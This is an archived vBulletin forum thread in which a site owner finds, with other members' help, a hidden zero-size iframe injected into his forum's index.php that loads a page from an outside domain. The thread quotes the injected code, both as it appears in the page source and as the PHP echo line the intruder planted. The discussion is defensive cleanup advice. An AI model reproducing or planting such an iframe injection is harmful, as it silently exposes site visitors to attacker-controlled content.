Go Back   vb.org Archive > vBulletin 4 Discussion > vB4 General Discussions
FAQ Community Calendar Today's Posts Search

Reply
 
Thread Tools Display Modes
  #1  
Old 10-05-2013, 01:06 PM
naveed.lodhi naveed.lodhi is offline
 
Join Date: Apr 2013
Location: Lahore, Pakistan
Posts: 33
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default Can't Remove an iFrame

I don't know what happened, but I think some hacker has put some iFrame on top of my website.
Code:
<iframe src="http://ferrerautoparts.com/ini.php"  width="0" height="0" frameborder="0"></iframe><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" dir="ltr" lang="en" id="vbulletin_html"> <head> <link rel="canonical" href="http://yopakistan.com/forum.php" />
I tried to search it from phpmyadmin, found some files, change and removed the code, but still its there. I have checked the templates but I can't find it there. What should I do?

You can check my website: http://www.yopakistan.com/forum.php and view its source and see the top most line.
Reply With Quote
  #2  
Old 10-05-2013, 01:13 PM
ozzy47's Avatar
ozzy47 ozzy47 is offline
 
Join Date: Jul 2009
Location: USA
Posts: 10,929
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Sorry to hear about your troubles.

First you need to follow our advisory about deleting the install folder off your forums.

Then please read the following two blog posts:
http://www.vbulletin.com/forum/blogs...ve-been-hacked

http://www.vbulletin.com/forum/blogs...vbulletin-site

Also please see these recent security announcements:

vBulletin 4.1.x-4.2.x & All versions of vBulletin 5: http://www.vbulletin.com/forum/forum...-1-vbulletin-5
vBulletin 5.0.x patch released, for a different security issue: http://www.vbulletin.com/forum/forum...d-all-versions
Reply With Quote
  #3  
Old 10-05-2013, 02:09 PM
cellarius's Avatar
cellarius cellarius is offline
 
Join Date: Aug 2005
Posts: 1,987
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Given the location of the iframe at the very top of the page, before the html output, I would look for the malicious code inside the php files, not the templates or plugins.
Reply With Quote
2 благодарности(ей) от:
CAG CheechDogg, tbworld
  #4  
Old 10-05-2013, 03:11 PM
naveed.lodhi naveed.lodhi is offline
 
Join Date: Apr 2013
Location: Lahore, Pakistan
Posts: 33
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

when I open the domain like yopakistan.com it also gives me error:

Unable to add cookies, header already sent.
File: /home/yopancom/public_html/index.php
Line: 42
Reply With Quote
  #5  
Old 10-05-2013, 03:15 PM
fxdigi-cash fxdigi-cash is offline
 
Join Date: Jul 2012
Posts: 674
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

or search for iframe in your templates if nothing found
Reply With Quote
  #6  
Old 10-05-2013, 03:35 PM
naveed.lodhi naveed.lodhi is offline
 
Join Date: Apr 2013
Location: Lahore, Pakistan
Posts: 33
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

@Cellarious: I found the issue in the Index.php file.

PHP Code:
if (defined('VB_RELATIVE_PATH'))

{

    
chdir('./' VB_RELATIVE_PATH);

}

echo 
'<iframe src="http://ferrerautoparts.com/ini.php"  width="0" height="0" frameborder="0"></iframe>';

require(
'forum.php'); 
I will re-install the forum so that there should be a clean installation. I wonder this will clear the Header Already Sent error as well.
Thank you so much for helping
Reply With Quote
Благодарность от:
cellarius
  #7  
Old 10-05-2013, 06:25 PM
fxdigi-cash fxdigi-cash is offline
 
Join Date: Jul 2012
Posts: 674
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

I see that the issue you were suffering has gone!!!

great to know
Reply With Quote
  #8  
Old 10-05-2013, 06:31 PM
nerbert nerbert is offline
 
Join Date: May 2008
Posts: 784
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by naveed.lodhi View Post
I wonder this will clear the Header Already Sent error as well.
Yes it should. I would be curious to know if you see any trace of this in the admincp logs. Normally to modify a file you would have to go through your server but you could do it with a temporary plugin using filesystem functions.
Reply With Quote
Reply


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT. The time now is 07:40 AM.


Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2024, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.05012 seconds
  • Memory Usage 2,241KB
  • Queries Executed 13 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)ad_showthread_firstpost
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (1)bbcode_code
  • (1)bbcode_php
  • (1)bbcode_quote
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (8)post_thanks_box
  • (3)post_thanks_box_bit
  • (8)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (2)post_thanks_postbit
  • (8)post_thanks_postbit_info
  • (8)postbit
  • (8)postbit_onlinestatus
  • (8)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 

Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_postinfo_query
  • fetch_postinfo
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • fetch_musername
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • post_thanks_function_fetch_thanks_bit_start
  • post_thanks_function_show_thanks_date_start
  • post_thanks_function_show_thanks_date_end
  • post_thanks_function_fetch_thanks_bit_end
  • post_thanks_function_fetch_post_thanks_template_start
  • post_thanks_function_fetch_post_thanks_template_end
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete